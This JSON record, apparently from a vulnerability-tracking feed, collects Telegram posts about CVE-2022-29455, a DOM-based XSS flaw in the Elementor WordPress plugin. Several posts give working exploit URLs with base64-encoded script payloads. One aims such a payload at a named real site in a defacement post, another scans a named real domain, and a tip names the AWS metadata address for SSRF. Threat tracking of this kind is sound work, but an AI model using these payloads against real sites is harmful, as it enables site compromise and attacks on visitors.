{"vulnerability": "cve-2022-29455", "sightings": [{"uuid": "d6495c66-c7ee-454d-8c3e-e2fe503ef5cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/bhhub/800", "content": "#BugBountyTips of the Day\n2FA Bypass Testing ( Method 12 )  ==> #WayToInject  => Try To Use SOAP Endpoint To Bypass 2FA.  #CipherEra #VedixEra #AlphaEraX #bugbounty #bugbountytips #redteam #offensivesecurity #cybersecuritytips #cybersecurity  https://t.co/cMCiLKm0tg\n---\n$5000 bounty Today is different, I\u2019m the GOAT of this game  #bugbounty @Bugcrowd  https://t.co/2dgbsqs9d5\n---\nMSRC took over 4 months to fix the root cause, and awarded this issue a $60,000 #BugBounty.  So\u2026 What were the key mistakes? (9/11)\n---\nNormal Localhost for most server lives at 127.0.0.1 but if you find AWS Ec2 Instance and want to try #SSRF then try 169.254.169.254 because this is AWS Localhost.  Normal Server: 127.0.0.1 AWS EC2 Instance:169.254.169.254  #bugbountytips #aws #cybersecurity\n---\nI create a custom nuclei template for mass hunting recent CVE-2022-29455(XSS) #bugbounty #nuclei  https://t.co/uMC9ldy3CJ", "creation_timestamp": "2022-06-15T13:37:05.000000Z"}, {"uuid": "97e72c04-bd5e-44f5-9181-16f8227be105", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2182", "content": "cve-2022-29455 elementor wordpress plugin xss exploit\nWhile searching for known bugs in Elementor we saw an interesting bug (CVE-2021-24891) that was raised in the past which uses a DOM-XSS to attack a user logged in to the system. Because we already have some knowledge in Javascript and had fun with DOM-XSS together in the past, we decided to deep dive into this CVE.\nhttps://github.com/alirezasalehizadeh/cve-2022-29455\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-08-13T21:02:10.000000Z"}, {"uuid": "760a9da5-bf57-42ba-adfb-5fc34c045369", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2181", "content": "Wordpress_xss-CVE-2022-29455\nhttps://github.com/GULL2100/Wordpress_xss-CVE-2022-29455\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-08-13T21:02:11.000000Z"}, {"uuid": "dd0e4f30-8df4-4845-9af8-e711d109a62a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "seen", "source": "https://t.me/poxek/2348", "content": "#CVE\n\nHacking 6.5+ million websites => Elementor\nCVE-2022-29455\n\n\u041e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 \u0432\u0430\u0448 Elementor!", "creation_timestamp": "2022-08-24T09:00:04.000000Z"}, {"uuid": "5cb6dcfa-c72f-43de-9984-c1b6c2c60113", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/228", "content": "CVE-2022-29455 - DOM-based Reflected Cross-Site Scripting (XSS) vulnerability\nhttps://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor", "creation_timestamp": "2022-06-17T17:02:30.000000Z"}, {"uuid": "4222a026-b796-4352-b512-bd3848bd3e98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "Telegram/ooqLCS5AaGtFvMn10NK3S303Tzb__PybETjDR1ZvJn4Jhrg", "content": "", "creation_timestamp": "2023-06-13T03:16:50.000000Z"}, {"uuid": "45337962-cc56-45c7-8fad-38e7ab7c9d11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/kucingscanner/37", "content": "CVE-2022-29455\n\nWordpress Vulnerability - XSS ( Cross-Site Scripting )\n\nVulnerability Location:\nhttps://add your target here/wp-content/plugins/elementor/assets/js/frontend.min.js\n\nVulnerable Version <= 3.5.5 versions\n\nPoC:\nhttps://add your target here/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==", "creation_timestamp": "2025-07-07T13:58:00.000000Z"}, {"uuid": "8353170c-b4ac-4c95-9f09-072a74737478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/h_sy_o/1018", "content": "Pass : @Devils_Sec\n\n- Coded By Devils Sec - 1967\n\n@Devils_sec - \ud83d\ude08\n@Devils_Sec_bot - \ud83d\udc41\u200d\ud83d\udde8", "creation_timestamp": "2023-07-07T13:06:02.000000Z"}, {"uuid": "6366a0c9-fb01-43de-a4d9-e22fcf0003e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "seen", "source": "https://t.me/h_sy_o/1017", "content": "Exploit CVE-2022-29455 \n\n- Devils Sec -1967\n@Devils_Sec - \ud83d\ude08\n@Devils_Sec_bot - \ud83d\udc41\u200d\ud83d\udde8", "creation_timestamp": "2023-07-07T13:05:58.000000Z"}, {"uuid": "3910bf5f-3ad5-4a25-8821-6d7479d975ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "seen", "source": "https://t.me/hackingtoolx/204", "content": "Exploit CVE-2022-29455 \n\n- Devils Sec -1967\n@Devils_Sec - \ud83d\ude08\n@Devils_Sec_bot - \ud83d\udc41\u200d\ud83d\udde8", "creation_timestamp": "2023-06-04T06:51:13.000000Z"}, {"uuid": "3b133c24-61b9-4dc3-8be1-f8393c803e4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/hackingtoolx/191", "content": "Pass : @Devils_Sec\n\n- Coded By Devils Sec - 1967\n\n@Devils_sec - \ud83d\ude08\n@Devils_Sec_bot - \ud83d\udc41\u200d\ud83d\udde8", "creation_timestamp": "2023-06-03T13:57:44.000000Z"}, {"uuid": "fc1305ea-f04e-4a1c-aa47-c0351854cd1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/TYG_YE/803", "content": "Pass : @Devils_Sec\n\n- Coded By Devils Sec - 1967\n\n@Devils_sec - \ud83d\ude08\n@Devils_Sec_bot - \ud83d\udc41\u200d\ud83d\udde8", "creation_timestamp": "2023-06-02T18:14:29.000000Z"}, {"uuid": "e54a4e27-c99d-423c-b673-6fbf4b816a88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "seen", "source": "https://t.me/TYG_YE/802", "content": "Exploit CVE-2022-29455 \n\n- Devils Sec -1967\n@Devils_Sec - \ud83d\ude08\n@Devils_Sec_bot - \ud83d\udc41\u200d\ud83d\udde8", "creation_timestamp": "2023-06-02T18:14:30.000000Z"}, {"uuid": "8c9df4c6-e2f5-4225-b088-b89cdb45e8a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/breachdetector/167931", "content": "{\n  \"Source\": \"arvin_club\",\n  \"Content\": \"Wordpress - XSS ( CVE-2022-29455) /wp-content/plugins/elementor/assets/js/frontend.min.js usage: https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg== https://github.com/akhilkoradiya/CVE-2022-29455\", \n  \"author\": \"ARVIN\",\n  \"Detection Date\": \"23 Dec 2022\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2022-12-23T14:30:44.000000Z"}, {"uuid": "3b2819e0-7b4d-4fda-8b6f-4eda900f8ee3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "Telegram/ZKsAfJNwVFXNMX8ViF-DSu9fH5ZvdTO6-dnreluWoks4cR4", "content": "", "creation_timestamp": "2023-01-16T17:35:18.000000Z"}, {"uuid": "8b698be3-8345-4257-80c7-a98cc950ad3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/DailyToolz/663", "content": "https://github.com/yaudahbanh/CVE-2022-29455/\n- @DailyToolz", "creation_timestamp": "2023-03-11T08:50:06.000000Z"}, {"uuid": "a43a4dc5-6c9f-4362-b93f-54c80044a57c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "seen", "source": "https://t.me/cibsecurity/44315", "content": "\u203c CVE-2022-29455 \u203c\n\nDOM-based Reflected Cross-Site Scripting (XSS) vulnerability in Elementor's Elementor Website Builder plugin <= 3.5.5 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-13T20:17:07.000000Z"}, {"uuid": "8d9e3b9f-79af-423b-94c6-b1ce619cc3a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/Devils_Sec/80", "content": "Exploit CVE-2022-29455 \ud83d\udc7e\n\n- Devils Sec -1967 \ud83d\udc7e\n\nURL : https://coloradoflights.org/#elementor-action:action=lightbox&settings=ew0KICAgICJ0eXBlIjogInZpZGVvIiwNCiAgICAidXJsIjogImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL3dhdGNoP3Y9ZmtkSEUyUFNZa00mdD0xM3MiLA0KICAgICJ2aWRlb1R5cGUiOiAiaG9zdGVkIiwNCiAgICAidmlkZW9QYXJhbXMiOiB7DQogICAgICAgICJvbmVycm9yIjoiYWxlcnQoJ0hhY2tlZCBCeSBEZXZpbHMgU2VjIC0gMTk2NycpIiwNCiAgICAgICAgInN0eWxlIjogImJhY2tncm91bmQtaW1hZ2U6dXJsKCdodHRwczovL2ZpbGVzLmNhdGJveC5tb2UvNWNob2E5LmpwZycpIg0KDQogICAgfQ0KfQ==\n\n@Devils_Sec - 1967\n@Devils_Sec_bot - \ud83e\udd16", "creation_timestamp": "2023-05-31T04:56:00.000000Z"}, {"uuid": "799b9a4f-0149-4152-9b6b-b1de2c212965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "seen", "source": "https://t.me/Devils_Sec/81", "content": "Exploit CVE-2022-29455 \n\n- Devils Sec -1967\n@Devils_Sec - \ud83d\ude08\n@Devils_Sec_bot - \ud83d\udc41\u200d\ud83d\udde8", "creation_timestamp": "2023-05-31T23:45:20.000000Z"}, {"uuid": "4c623778-1542-43ce-992d-d5a6ad1da7ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/Devils_Sec/83", "content": "Pass : @Devils_Sec\n\n- Coded By Devils Sec - 1967\n\n@Devils_sec - \ud83d\ude08\n@Devils_Sec_bot - \ud83d\udc41\u200d\ud83d\udde8", "creation_timestamp": "2023-06-01T01:20:15.000000Z"}, {"uuid": "3ce96457-4506-409a-bb0b-79ce375948e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/arvin_club/6310", "content": "Wordpress - XSS ( CVE-2022-29455)\n/wp-content/plugins/elementor/assets/js/frontend.min.js\nusage:\nhttps://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==\nhttps://github.com/akhilkoradiya/CVE-2022-29455", "creation_timestamp": "2022-12-23T12:16:55.000000Z"}, {"uuid": "5da34981-a0c8-401a-a43a-ffc845cc0a3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "exploited", "source": "https://t.me/LearnExploit/4456", "content": "Wordpress - XSS ( CVE-2022-29455)\n\n/wp-content/plugins/elementor/assets/js/frontend.min.js\n\nusage:\n\nhttps://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==\n\n#wordpress #xss\n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-04T10:02:39.000000Z"}, {"uuid": "d0c8b37f-7533-45a5-b260-fa97bad89556", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/ashaburroyah313/614", "content": "\u2514\u2500$ nuclei -u ./CVE-2022-29455 -u https://www.internic.co.il -v", "creation_timestamp": "2023-08-05T18:28:12.000000Z"}, {"uuid": "f6842931-6ec3-41c7-8033-0d588acbf993", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1243", "content": "Wordpress - XSS ( CVE-2022-29455)\n/wp-content/plugins/elementor/assets/js/frontend.min.js\nusage:\nhttps://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==\n\n#wordpress #xss", "creation_timestamp": "2022-12-23T12:20:54.000000Z"}, {"uuid": "cb4a1cae-6c07-434a-9dac-9eddffdd2916", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "exploited", "source": "https://t.me/thebugbountyhunter/6308", "content": "Hacking 6.5+ million websites => CVE-2022-29455 (Elementor)\n\nhttps://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor", "creation_timestamp": "2022-06-14T06:42:19.000000Z"}, {"uuid": "29e5dd13-f5d6-42e4-98e2-2dd4d891068b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29455", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/6344", "content": "#exploit\n1. CVE-2022-24545, CVE-2022-30165:\nKerberos Redirected Logon Buffer EoP (Windows Srv 2022)\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=2271\n\n2. CVE-2022-29455:\nWordpress XSS\nhttps://github.com/GULL2100/Wordpress_xss-CVE-2022-29455", "creation_timestamp": "2022-07-06T21:55:00.000000Z"}]}